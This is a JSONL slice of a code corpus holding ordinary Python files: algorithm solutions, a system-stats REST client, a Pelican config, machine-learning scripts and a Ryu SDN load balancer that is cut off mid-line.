else:\r\n i = 1\r\n nums1_i = 0\r\n nums2_i = 0\r\n while i < n / 2:\r\n if nums1[nums1_i] >= nums2[nums2_i]:\r\n nums2_i = nums2_i + 1\r\n else:\r\n nums1_i = nums1_i + 1\r\n i = i + 1\r\n x = min(nums1[nums1_i], nums2[nums2_i])\r\n\r\n return x\r\n else:\r\n # nums2 left of nums1\r\n if n // 2 == len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n return (nums1[0] + nums2[-1]) / 2\r\n elif n // 2 > len(nums2) and nums1[n // 2 - len(nums2)] >= nums2[-1]:\r\n return (nums1[n // 2 - len(nums2)] + max(nums1[n // 2 - len(nums2) - 1], nums2[-1])) / 2\r\n elif n // 2 == len(nums2) and nums1[0] >= nums2[-1]:\r\n return (nums2[-1] + nums1[0]) / 2\r\n elif n // 2 < len(nums2) and nums1[0] >= nums2[n // 2]:\r\n return (nums2[n // 2-1] + min(nums2[n // 2 ], nums1[0])) / 2\r\n # nums2 right of nums1\r\n elif n // 2 == len(nums1) and nums2[n // 2 - len(nums1)] >= nums1[-1]:\r\n return (nums2[0] + nums1[-1]) / 2\r\n elif n // 2 > len(nums1) and nums2[n // 2 - len(nums1)] >= nums1[-1]:\r\n return (nums2[n // 2 - len(nums1)] + max(nums2[n // 2 - len(nums1) - 1], nums1[-1])) / 2\r\n elif n // 2 == len(nums1) and nums2[0] >= nums1[-1]:\r\n return (nums1[-1] + nums2[0]) / 2\r\n elif n // 2 < len(nums1) and nums2[0] >= nums1[n // 2]:\r\n return (nums1[n // 2-1] + min(nums1[n // 2], nums2[0]))/2\r\n else:\r\n i = 1\r\n nums1_i = 0\r\n nums2_i = 0\r\n while i < n / 2:\r\n if nums1[nums1_i] >= nums2[nums2_i]:\r\n nums2_i = nums2_i + 1\r\n else:\r\n nums1_i = nums1_i + 1\r\n i = i + 1\r\n\r\n if nums1[nums1_i] >= nums2[nums2_i]:\r\n return (nums2[nums2_i] + min(nums2[nums2_i + 1],nums1[nums1_i]) )/ 2\r\n else:\r\n return (nums1[nums1_i]+min(nums1[nums1_i+1],nums2[nums2_i]))/2\r\n\r\n\r\n\r\nif __name__=='__main__':\r\n A=[1]\r\n B=[1]\r\n Test=Solution()\r\n print(Test.findMedianSortedArrays(A,B))\r\n\r\n","sub_path":"Array/4. Median of Two Sorted Arrays.py","file_name":"4. 
Median of Two Sorted Arrays.py","file_ext":"py","file_size_in_byte":5295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"629219396","text":"import requests, json, sys\nimport os.path\nsys.path.append(os.path.join(os.path.dirname(__file__), '..'))\nfrom system.SysCPU import SysCPU\nfrom system.SysService import SysService\nfrom system.SysOS import SysOS\nfrom system.SysDisc import SysDisc\nfrom system.SysMemory import SysMemory\nimport config\n\nclass Rest(object):\n\n token = open('data/token.dat', 'r')\n token = token.readline()\n\n def saveServiceInfo(self):\n services = SysService()\n data = []\n for service in services.service_list:\n data = {\"name\": service.name, \"status\": service.status.value, \"token\":self.token}\n requests.post(config.HOST+\"/api/service/\", data=data)\n\n def saveOSInfo(self):\n os = SysOS()\n os_info = os.OSinfo()\n data = {\"distributor_id\": os_info.distributor_id, \"release\": os_info.release,\n \"codename\": os_info.codename, \"description\": os_info.description, \"token\":self.token}\n requests.post(config.HOST+\"/api/os/\", data=data)\n\n def saveDiscInfo(self):\n disc = SysDisc()\n data = []\n for disc_info in disc.discs:\n data = {\"file_system\": disc_info.file_system, \"size\": disc_info.size, \"used\": disc_info.used,\n \"free\": disc_info.free, \"free_percent\": disc_info.free_percent, \"mounted_in\": disc_info.mounted_in, \"token\": self.token}\n requests.post(config.HOST+\"/api/disc/\", data=data)\n\n def saveMemoryInfo(self):\n memory = SysMemory()\n data = {\"free\": memory.memory.free, \"percent_used\": memory.memory.percent_used, \"total\": memory.memory.total, \"used\": memory.memory.used, \"token\": self.token }\n requests.post(config.HOST+\"/api/memory/\", data=data)\n\n def saveCPUInfo(self):\n cpu = SysCPU()\n cpu_info = cpu.CPUinfo()\n data = {\"architecture\": cpu_info.architecture, \"vendor_id\": cpu_info.vendor_id, \"model_name\": cpu_info.model_name,\n \"cpu_cores\": cpu_info.cpu_cores, \"percent_used\": cpu_info.percent_used, \"token\": self.token }\n requests.post(config.HOST+\"/api/cpu/\", data=data)\n","sub_path":"rest/Rest.py","file_name":"Rest.py","file_ext":"py","file_size_in_byte":2088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"160559193","text":"\"\"\"\nThe idea here is that we'd like to use our library\nto minimize a function, say ** 2\n\"\"\"\nfrom autograd.tensor import Tensor\n\nx = Tensor([10, -10, 10, -5, 6, 3, 1],requires_grad=True)\n\n# we want to minimize the sum of squares\nfor i in range(100):\n # print(x)\n x.zero_grad()\n sum_of_squares = (x * x).sum() # is a 0-tensor\n sum_of_squares.backward()\n\n # what i would like to do\n # ugly b/c we haven't implemented the stuff yet\n delta_x = 0.1 * x.grad\n # print(delta_x.data,x.data)\n x -= delta_x\n print(i, sum_of_squares)","sub_path":"examples/minimize_a_function.py","file_name":"minimize_a_function.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"455264185","text":"# Copyright (C) 2015 Yipeng Sun \n# This software is distributed under the terms of the GNU GPL version 2.\n\n__license__ = 'GPLv2'\n__author__ = __maintainer__ = 'Yipeng Sun'\n__email__ = 'solarisbill@gmail.com'\n\n\nfrom .calc import RegressionGenerator\nfrom .fmt import ufloat, fmt, align_col\nfrom .rw import read_xlsx, xlsx_read_col, read_csv, write_csv\n\n__all__ = 
['RegressionGenerator',\n 'ufloat', 'fmt', 'align_col',\n 'read_xlsx', 'xlsx_read_col', 'read_csv', 'write_csv'\n ]\n","sub_path":"physlab/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"60092197","text":"class Solution:\n \"\"\"\n @param logs: the logs\n @return: the log after sorting\n \"\"\"\n def logSort(self, logs):\n # Write your code here\n withInt = []\n withStr = []\n for i in logs:\n if i.split(' ')[-1].isdigit():\n withInt.append(i)\n else:\n withStr.append(i)\n \n return sorted(withStr, key = Solution.mykey) + withInt\n \n @staticmethod\n def mykey(x):\n pos = x.index(' ')\n return (x[pos+1:], x[:pos])\n \n \n \n ","sub_path":"Company/Amazon/OA_2/14. Reorder Log File/learning_solution.py","file_name":"learning_solution.py","file_ext":"py","file_size_in_byte":570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"651952708","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'Ray Alez'\nSITENAME = 'digitalmind'\nSITEURL = ''\n\nPATH = 'content'\nSTATIC_PATHS = [\n 'static/.htaccess',\n 'static/CNAME',\n 'images',\n ]\n\n\nTIMEZONE = 'Europe/Paris'\n\nDEFAULT_LANG = 'en'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = 'feeds/all.atom.xml' #None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Menu\nMENUITEMS = [('Home', '/'), ('Articles', '/articles')]\n\n# Social widget\nSOCIAL = (('You can add links in your config file', '#'),\n ('Another social link', '#'),)\n\nDEFAULT_PAGINATION = 8\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\nARTICLE_URL = 'post/{slug}'\nARTICLE_SAVE_AS = 'post/{slug}.html'\nPAGE_URL = '{slug}'\nPAGE_SAVE_AS = '{slug}.html'\n\n# TAG_URL = 'tag/{slug}/'\n# TAG_SAVE_AS = 'tag/{slug}/index.html'\n# TAGS_URL = 'tags/'\n# TAGS_SAVE_AS = 'tags/index.html'\n\n# PAGINATION_PATTERNS = (\n# (1, '{base_name}/posts/', '{base_name}/index.html'),\n# (2, '{base_name}/posts/{number}/', '{base_name}/posts/{number}/index.html'),\n#)\n\nDIRECT_TEMPLATES = ('index', 'tags', 'categories', 'archives', ) #'about'\n\nTAG_SAVE_AS = ''\nAUTHOR_SAVE_AS = ''\n\nTHEME = \"/home/ray/projects/digitalmind/themes/digitalmind\"\n\n# Plugins\nPLUGIN_PATHS = ['/home/ray/projects/digitalmind/pelican-plugins']\nPLUGINS = ['liquid_tags.img', 'liquid_tags.video',\n 'liquid_tags.include_code', 'liquid_tags.notebook']\n\nEXTRA_HEADER = open('_nb_header.html').read() #.encode('utf-8')\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":1863,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"577235918","text":"import sys\n\nimport requests\n\nPY3 = sys.version_info[0] == 3\n\nif PY3: # pragma: nocover\n string_types = str,\n import io\n BytesIO = io.BytesIO\n\nelse: # pragma: nocover\n string_types = basestring,\n import StringIO\n BytesIO = StringIO.StringIO\n\n\nclass WithRequests(object):\n\n req_timeout = 10\n \n req_user_agent = (\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) '\n 
'Chrome/74.0.3729.169 YaBrowser/19.6.2.594 (beta) Yowser/2.5 Safari/537.36'\n )\n\n @classmethod\n def _get_response(cls, url, **kwargs):\n\n kwargs_ = {\n 'timeout': cls.req_timeout,\n 'headers': {\n 'User-Agent': cls.req_user_agent\n },\n }\n kwargs_.update(kwargs)\n\n return requests.get(url, **kwargs_)\n","sub_path":"pycbrf/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"121481164","text":"# coding=utf8\n\nfrom ..commons.common import MyProcessor\nfrom sklearn.ensemble import RandomForestClassifier\nimport pandas as pd\nimport shelve,path\nimport itertools\n\n\nclass FeatureSelectProcessor(MyProcessor):\n \"\"\"采用日志去记录运行状况,通过日志来检查是否运行过了\"\"\"\n def __init__(self,dm,cv):\n self.__dm=dm\n self.__cv=cv\n self.__para = dict(n_estimators=500, max_depth=2, max_features=0.1,class_weight=\"balanced\",\n min_samples_leaf=4, random_state=0, n_jobs=7)\n\n def process(self, msg):\n df_all=msg[\"data\"]\n print(df_all.head())\n sample_name=msg[\"sample_name\"]\n\n df_train=self.__dm.prepare_train_df(df_all,sample_name)\n input_col,output_col,weight,info_col=self.__dm.cols\n\n clf = RandomForestClassifier()\n clf.set_params(**self.__para)\n\n clf.fit(df_train[input_col], df_train[output_col].values.reshape(-1), sample_weight=df_train[weight].values.reshape(-1))\n df_fi = pd.DataFrame()\n df_fi[\"feature_name\"] =input_col\n df_fi[\"importance\"] = clf.feature_importances_\n df_fi.sort_values(\"importance\",ascending=False,inplace=True)\n # 交叉验证\n res_cols={}\n self.__para=dict(n_estimators=500, max_depth=4, max_features=0.1,class_weight=\"balanced\",\n min_samples_leaf=4, random_state=0, n_jobs=7)\n clf = RandomForestClassifier()\n clf.set_params(**self.__para)\n ct = itertools.count()\n for k in list(range(1,5))+list(range(5,600,40)):\n cols=df_fi[\"feature_name\"][0:k].tolist()\n res_cols[k]=self.__cv.start_cv({\"clf\":clf,\"data\":df_all[info_col+cols]})\n print(\"========================This is the %s cycle of CV !=============\"%ct.__next__())\n\n with shelve.open(\"E:/my_proj/pre_fog/resources/fixed_data/Tuned4ModelData/FeatureSelectDOE/feature_select_result\") as db:\n db[\"data\"]=res_cols\n db[\"rank\"]=df_fi\n\n\nclass SelectModelParameter(MyProcessor):\n def __init__(self,cv):\n self.__cv=cv\n self.__para = dict(n_estimators=500, max_depth=4, max_features=0.1, class_weight=\"balanced\",\n min_samples_leaf=4, random_state=0, n_jobs=7)\n\n def process(self, msg):\n\n df_all = msg[\"data\"]\n print(df_all.head())\n\n # 交叉验证\n res_cols = {}\n para_path=r\"E:\\my_proj\\pre_fog\\resources\\fixed_data\\Tuned4ModelData\\FeatureSelectDOE\\para.csv\"\n\n ct = itertools.count()\n\n para_df=pd.read_csv(para_path)\n for i in para_df.index:\n para_dic=para_df.loc[i, :].to_dict()\n para_dic={k:float(v) if k in [\"max_features\"] else int(v) for k,v in para_dic.items()}\n self.__para.update(para_dic)\n clf = RandomForestClassifier()\n clf.set_params(**self.__para)\n res_cols[i]=self.__cv.start_cv({\"clf\":clf,\"data\":df_all})\n print(\"========================This is the %s cycle of CV !=============\" % ct.__next__())\n\n with shelve.open(\"E:/my_proj/pre_fog/resources/fixed_data/Tuned4ModelData/FeatureSelectDOE/para_select_result\") as db:\n 
db[\"data\"]=res_cols\n\n\n\n\n\n\n\n\n","sub_path":"resources/recognition_pre_fog/select_feature_para/processors.py","file_name":"processors.py","file_ext":"py","file_size_in_byte":3216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"473349551","text":"\nfrom textblob.classifiers import NaiveBayesClassifier\n\ntrain = [\n ('I love this sandwich.', 'pos'),\n ('This is an amazing place!', 'pos'),\n ('I feel very good about these beers.', 'pos'),\n ('This is my best work.', 'pos'),\n (\"What an awesome view\", 'pos'),\n ('I do not like this restaurant', 'neg'),\n ('I am tired of this stuff.', 'neg'),\n (\"I can't deal with this\", 'neg'),\n ('He is my sworn enemy!', 'neg'),\n ('My boss is horrible.', 'neg')\n]\n\ncl = NaiveBayesClassifier(train)\nprint(cl.classify(\"Their burgers are amazing\"))\n","sub_path":"analytics/GARAGE/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"59332445","text":"from ryu.base import app_manager\nfrom ryu.controller import ofp_event\nfrom ryu.controller.handler import CONFIG_DISPATCHER, MAIN_DISPATCHER, DEAD_DISPATCHER\nfrom ryu.controller.handler import set_ev_cls\nfrom ryu.lib.packet.packet import Packet\nfrom ryu.ofproto import ofproto_v1_3, ofproto_v1_5\nfrom ryu.lib.packet import packet\nfrom ryu.lib.packet import ethernet\nfrom ryu.lib.packet import tcp, udp, icmp\nfrom ryu.lib.packet import ether_types\nfrom ryu.lib.packet import ipv4\nfrom ryu.lib.packet import arp\nfrom operator import attrgetter\nfrom ryu.lib import hub\nimport datetime\nimport requests\nimport json\nimport re\nimport random\nimport os, subprocess\n\n\"\"\" \n TOPOLOGY:\n h1 --- * * --- h5 (server)\n | |\n h2 --- * --- s1 --- * --- h6 (server)\n | \n h3 --- * \n |\n h4 --- *\n\"\"\"\n\n\nclass SimpleLoadBalancer(app_manager.RyuApp):\n OFP_VERSIONS = [ofproto_v1_5.OFP_VERSION]\n virtual_ip = \"10.0.0.100\" # The virtual server IP\n H11_mac = \"00:00:00:00:00:0B\"\n H11_ip = \"10.0.0.11\"\n H12_mac = \"00:00:00:00:00:0C\"\n H12_ip = \"10.0.0.12\"\n H13_mac = \"00:00:00:00:00:0D\"\n H13_ip = \"10.0.0.13\"\n H14_mac = \"00:00:00:00:00:0E\"\n H14_ip = \"10.0.0.14\"\n group_table_id = 50\n rt = 'http://127.0.0.1:8008'\n ip_to_port = {\"10.0.0.1\": 1,\n \"10.0.0.2\": 2,\n \"10.0.0.3\": 3,\n \"10.0.0.4\": 4,\n \"10.0.0.5\": 5,\n \"10.0.0.6\": 6,\n \"10.0.0.7\": 7,\n \"10.0.0.8\": 8,\n \"10.0.0.9\": 9,\n \"10.0.0.10\": 10,\n \"10.0.0.11\": 11,\n \"10.0.0.12\": 12,\n \"10.0.0.13\": 13,\n \"10.0.0.14\": 14}\n ip_to_mac = {\"10.0.0.1\": \"00:00:00:00:00:01\",\n \"10.0.0.2\": \"00:00:00:00:00:02\",\n \"10.0.0.3\": \"00:00:00:00:00:03\",\n \"10.0.0.4\": \"00:00:00:00:00:04\",\n \"10.0.0.5\": \"00:00:00:00:00:05\",\n \"10.0.0.6\": \"00:00:00:00:00:06\",\n \"10.0.0.7\": \"00:00:00:00:00:07\",\n \"10.0.0.8\": \"00:00:00:00:00:08\",\n \"10.0.0.9\": \"00:00:00:00:00:09\",\n \"10.0.0.10\": \"00:00:00:00:00:0A\",\n \"10.0.0.11\": \"00:00:00:00:00:0B\",\n \"10.0.0.12\": \"00:00:00:00:00:0C\",\n \"10.0.0.13\": \"00:00:00:00:00:0D\",\n \"10.0.0.14\": \"00:00:00:00:00:0E\"}\n port_to_mac = {1: \"00:00:00:00:00:01\",\n 2: \"00:00:00:00:00:02\",\n 3: \"00:00:00:00:00:03\",\n 4: \"00:00:00:00:00:04\",\n 5: \"00:00:00:00:00:05\",\n 6: \"00:00:00:00:00:06\",\n 7: \"00:00:00:00:00:07\",\n 8: \"00:00:00:00:00:08\",\n 9: \"00:00:00:00:00:09\",\n 10: \"00:00:00:00:00:0A\",\n 11: \"00:00:00:00:00:0B\",\n 12: \"00:00:00:00:00:0C\",\n 13: 
\"00:00:00:00:00:0D\",\n 14: \"00:00:00:00:00:0E\"}\n port_to_ip = {1: \"10.0.0.1\",\n 2: \"10.0.0.2\",\n 3: \"10.0.0.3\",\n 4: \"10.0.0.4\",\n 5: \"10.0.0.5\",\n 6: \"10.0.0.6\",\n 7: \"10.0.0.7\",\n 8: \"10.0.0.8\",\n 9: \"10.0.0.9\",\n 10: \"10.0.0.10\",\n 11: \"10.0.0.11\",\n 12: \"10.0.0.12\",\n 13: \"10.0.0.13\",\n 14: \"10.0.0.14\"}\n throuhput = [0] * 15 # in kbps\n rx_bytes = [0] * 15\n loadBalancingAlgorithm = 'random' # 'random' / 'roundRobin' / 'leastBandwidth' / 'none'\n idle_timeout = 3\n hard_timeout = 10\n priority = 20\n\n def __init__(self, *args, **kwargs):\n super(SimpleLoadBalancer, self).__init__(*args, **kwargs)\n self.datapaths = {}\n self.elephant_flows = {}\n self.SendElephantFlowMonitor()\n if self.loadBalancingAlgorithm != 'none':\n self.elephant_thread = hub.spawn(self.ElephantFlowMonitor)\n self.monitor_thread = hub.spawn(self._monitor)\n self.tput_thread = hub.spawn(self.port_stats_monitor)\n self.logger.info(\"--------------------------------------------------------------\")\n self.logger.info(\"%s: STARTUP\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n self.logger.info(\"%s: Selected Load Balancing algorithm: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n self.loadBalancingAlgorithm)\n self.logger.info(\"--------------------------------------------------------------\")\n with open('server_output_throughput.csv', 'w') as f:\n pass\n\n def _monitor(self):\n while True:\n self._request_stats()\n hub.sleep(0.5)\n\n def port_stats_monitor(self):\n while True:\n for dp in self.datapaths.values():\n self.port_stats(dp)\n hub.sleep(1)\n\n def port_stats(self, datapath):\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)\n datapath.send_msg(req)\n\n @set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)\n def _port_stats_reply_handler(self, ev):\n body = ev.msg.body\n for stat in sorted(body, key=attrgetter('port_no'))[:-1]:\n self.throuhput[stat.port_no] = (stat.rx_bytes - self.rx_bytes[stat.port_no]) * 8 / 1024\n self.rx_bytes[stat.port_no] = stat.rx_bytes\n\n with open('server_output_throughput.csv', 'a') as f:\n f.write('{:.0f},{:.0f},{:.0f},{:.0f}\\n'.format(self.throuhput[11], self.throuhput[12], self.throuhput[13],\n self.throuhput[14]))\n\n def _request_stats(self):\n elephant_flows = {}\n elephant_flows[\"10.0.0.1\"] = 0\n elephant_flows[\"10.0.0.2\"] = 0\n elephant_flows[\"10.0.0.3\"] = 0\n elephant_flows[\"10.0.0.4\"] = 0\n elephant_flows[\"10.0.0.5\"] = 0\n elephant_flows[\"10.0.0.6\"] = 0\n elephant_flows[\"10.0.0.7\"] = 0\n elephant_flows[\"10.0.0.8\"] = 0\n elephant_flows[\"10.0.0.9\"] = 0\n elephant_flows[\"10.0.0.10\"] = 0\n\n proc = subprocess.Popen(['ovs-ofctl', 'dump-flows', 's1', '--protocol=OpenFlow15'], stdout=subprocess.PIPE,\n stderr=subprocess.DEVNULL)\n proc.wait()\n lines = proc.stdout.readlines()\n for row in lines:\n if \"=10.0.0.1,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.1\"] += 1\n elif \"=10.0.0.2,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.2\"] += 1\n elif \"=10.0.0.3,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.3\"] += 1\n elif \"=10.0.0.4,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.4\"] += 1\n elif \"=10.0.0.5,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.5\"] += 1\n elif \"=10.0.0.6,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.6\"] += 1\n elif \"=10.0.0.7,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.7\"] += 1\n elif \"=10.0.0.8,\" in 
row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.8\"] += 1\n elif \"=10.0.0.9,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.9\"] += 1\n elif \"=10.0.0.10,\" in row.decode(\"utf-8\"):\n elephant_flows[\"10.0.0.10\"] += 1\n\n self.elephant_flows = elephant_flows\n\n def SendElephantFlowMonitor(self):\n flowTcp = {'keys': 'link:inputifindex,ipsource,ipdestination,ipprotocol,tcpsourceport,tcpdestinationport',\n 'value': 'bytes'}\n requests.put(self.rt + '/flow/pair/json', data=json.dumps(flowTcp))\n\n threshold = {'metric': 'pair', 'value': 100000 / 8 * 5, 'byFlow': True, 'timeout': 1}\n requests.put(self.rt + '/threshold/elephant/json', data=json.dumps(threshold))\n\n def ElephantFlowMonitor(self):\n eventurl = self.rt + '/events/json?thresholdID=elephant&maxEvents=10&timeout=60'\n eventID = -1\n while True:\n try:\n r = requests.get(eventurl + \"&eventID=\" + str(eventID), timeout=0.01)\n except:\n hub.sleep(1)\n continue\n if r.status_code != 200: break\n events = r.json()\n if len(events) == 0:\n continue\n\n eventID = events[0][\"eventID\"]\n events.reverse()\n for e in events:\n try:\n datapath = self.datapaths[1]\n except:\n continue\n self.priority = 20\n\n [server_ip, host_ip] = re.findall('10\\.0\\.0\\.[0-9]', str(e['flowKey']))\n # print(self.elephant_flows)\n if self.elephant_flows[host_ip] == 1:\n self.priority = 21\n continue\n elif self.elephant_flows[host_ip] != 0:\n continue\n else:\n self.logger.info(\"{}: Elephant flow ( 1Mbps ) detected {}\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f'), e['flowKey']))\n # self.elephant_flows[host_ip] = 1\n\n self.logger.info(\"{}: Elephant flow ( 1Mbps ) detected {}\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f'), e['flowKey']))\n\n server_ip = getServerIp(self.loadBalancingAlgorithm)\n\n self.logger.info(\"{}: Elephant flow redirecting to: {}\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f'), server_ip))\n\n in_port = self.ip_to_port[server_ip]\n eth_type = ether_types.ETH_TYPE_IP\n ip_proto = 0x06\n tcp_port = 5000\n parser = datapath.ofproto_parser\n\n # Elephant flow ( 1Mbps ) detected s1-h5,10.0.0.5,10.0.0.2,6,80,44714\n # Flow from server to host\n match = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n ipv4_src=server_ip,\n ipv4_dst=host_ip,\n ip_proto=ip_proto,\n tcp_src=tcp_port)\n actions = [parser.OFPActionSetField(ipv4_src=self.virtual_ip),\n parser.OFPActionOutput(self.ip_to_port[host_ip])]\n self.add_flow(datapath, self.priority, match, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n\n # Reverse flow host to server\n in_port = self.ip_to_port[host_ip]\n match1 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H11_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n match2 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H12_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n match3 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H13_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n match4 = parser.OFPMatch(\n in_port=in_port,\n eth_type=eth_type,\n eth_dst=self.ip_to_mac[self.H14_ip],\n ipv4_src=host_ip,\n ipv4_dst=self.virtual_ip,\n ip_proto=ip_proto,\n tcp_dst=tcp_port)\n actions = [parser.OFPActionSetField(ipv4_dst=server_ip),\n parser.OFPActionSetField(eth_dst=self.ip_to_mac[server_ip]),\n 
parser.OFPActionOutput(self.ip_to_port[server_ip])]\n self.add_flow(datapath, self.priority, match1, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n self.add_flow(datapath, self.priority, match2, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n self.add_flow(datapath, self.priority, match3, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n self.add_flow(datapath, self.priority, match4, actions, idle_timeout=self.idle_timeout,\n hard_timeout=self.hard_timeout)\n\n self.logger.info(\"{}: Instaled new flows for elephant flow\".format(\n datetime.datetime.now().strftime('%H:%M:%S.%f')))\n\n @set_ev_cls(ofp_event.EventOFPStateChange, [MAIN_DISPATCHER, DEAD_DISPATCHER])\n def _state_change_handler(self, ev):\n datapath = ev.datapath\n if ev.state == MAIN_DISPATCHER:\n if datapath.id not in self.datapaths:\n self.logger.info(\"%s: Register datapath: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n datapath.id)\n self.datapaths[datapath.id] = datapath\n elif ev.state == DEAD_DISPATCHER:\n if datapath.id in self.datapaths:\n self.logger.info(\"%s: Unregister datapath: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n datapath.id)\n del self.datapaths[datapath.id]\n\n @set_ev_cls(ofp_event.EventOFPSwitchFeatures, CONFIG_DISPATCHER)\n def switch_features_handler(self, ev):\n datapath = ev.msg.datapath\n ofproto = datapath.ofproto\n parser = datapath.ofproto_parser\n\n match = parser.OFPMatch()\n actions = [parser.OFPActionOutput(ofproto.OFPP_CONTROLLER,\n ofproto.OFPCML_NO_BUFFER)]\n self.add_flow(datapath, 0, match, actions)\n\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def packet_in_handler(self, ev):\n msg = ev.msg\n dp = msg.datapath\n ofp = dp.ofproto\n ofp_parser = dp.ofproto_parser\n in_port = msg.match['in_port']\n\n pkt = packet.Packet(msg.data)\n etherFrame = pkt.get_protocol(ethernet.ethernet)\n\n # If the packet is an ARP packet, create new flow table\n # entries and send an ARP response.\n if etherFrame.ethertype == ether_types.ETH_TYPE_ARP:\n self.arp_response(dp, pkt, etherFrame, ofp_parser, ofp, in_port)\n return\n elif etherFrame.ethertype == ether_types.ETH_TYPE_IP:\n self.logger.info(\"%s: Got Packet In: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n \"ETH_TYPE_IP\")\n self.add_twoway_flow(dp, msg)\n return\n else:\n self.logger.warning(\"Got Packet In which is neither ARP neither IPv4 !\")\n self.logger.info(\"%s: Got Packet In: %s\", datetime.datetime.now().strftime('%H:%M:%S.%f'),\n etherFrame.ethertype)\n return\n\n\n # Sends an ARP response to the contacting host with the\n # real MAC address of a server.\n def arp_response(self, datapath, packet, etherFrame, ofp_parser, ofp, in_port):\n arpPacket = packet.get_protocol(arp.arp)\n dstIp = arpPacket.src_ip\n srcIp = arpPacket.dst_ip\n dstMac = etherFrame.src\n\n # If the ARP request isn't from one of the two servers,\n # choose the target/source MAC address from one of the servers;\n # else the target MAC address is set to the one corresponding\n # to the target host's IP.\n if dstIp != self.H11_ip and dstIp != self.H12_ip and dstIp != self.H13_ip and dstIp != self.H14_ip:\n srcMac = self.ip_to_mac[self.H11_ip]\n # self.logger.info(\"%s: Sending ARP reply to HOST\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n else:\n srcMac = self.ip_to_mac[srcIp]\n # self.logger.info(\"%s: Sending ARP reply to SERVER\", datetime.datetime.now().strftime('%H:%M:%S.%f'))\n\n e = ethernet.ethernet(dstMac, srcMac, 
